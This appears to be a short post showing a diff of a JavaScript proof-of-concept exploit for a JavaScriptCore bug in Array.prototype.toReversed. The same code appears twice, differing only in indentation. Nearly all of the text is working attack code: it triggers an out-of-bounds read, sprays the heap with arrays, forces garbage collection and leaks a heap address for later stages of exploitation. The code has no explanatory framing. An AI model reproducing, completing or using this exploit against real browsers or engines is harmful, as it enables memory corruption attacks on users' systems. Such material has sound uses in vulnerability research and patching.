ntfargo · January 31, 2025 18:50
diff --git a/053d9a84.js b/053d9a84.js
 // 1 triggers the vulnerability:
 const v1 = [-1n]; // create a JSArray 
 let v2;
 v2 = v1.toReversed();// call arrayProtoFuncToReversed
 print(describe(v2));
 sleepSeconds(5); // pause execution
 print(v2[2].print()); // access randomly a field of v2[2]

 // 2 Leaking addresses
 function gc() {
    new Uint8Array(4 * 1024 * 1024);
 }

 let spray_arr = new Array(0x20);
 for (let i = 0; i < 0x40; i++) {
   spray_arr[i] = [2.1*i, 2.2, 2.3]; // spray some arrays
 }
 gc(); // clean memory and force allocation reusing above’s heap 

 b1 = [1.1];
 b1 = b1.toReversed();
 let addr1 = f2i(b1[1]);// b1[1] is previous heap chunk and will be leaked
 print ("leak1: " + hex(addr1));
	// 1 triggers the vulnerability:
	const v1 = [-1n]; // create a JSArray
	let v2;
	v2 = v1.toReversed();// call arrayProtoFuncToReversed
	print(describe(v2));
	sleepSeconds(5); // pause execution
	print(v2[2].print()); // access randomly a field of v2[2]

	// 2 Leaking addresses
	function gc() {
	new Uint8Array(4 * 1024 * 1024);
	}

	let spray_arr = new Array(0x20);
	for (let i = 0; i < 0x40; i++) {
	spray_arr[i] = [2.1*i, 2.2, 2.3]; // spray some arrays
	}
	gc(); // clean memory and force allocation reusing above’s heap

	b1 = [1.1];
	b1 = b1.toReversed();
	let addr1 = f2i(b1[1]);// b1[1] is previous heap chunk and will be leaked
	print ("leak1: " + hex(addr1));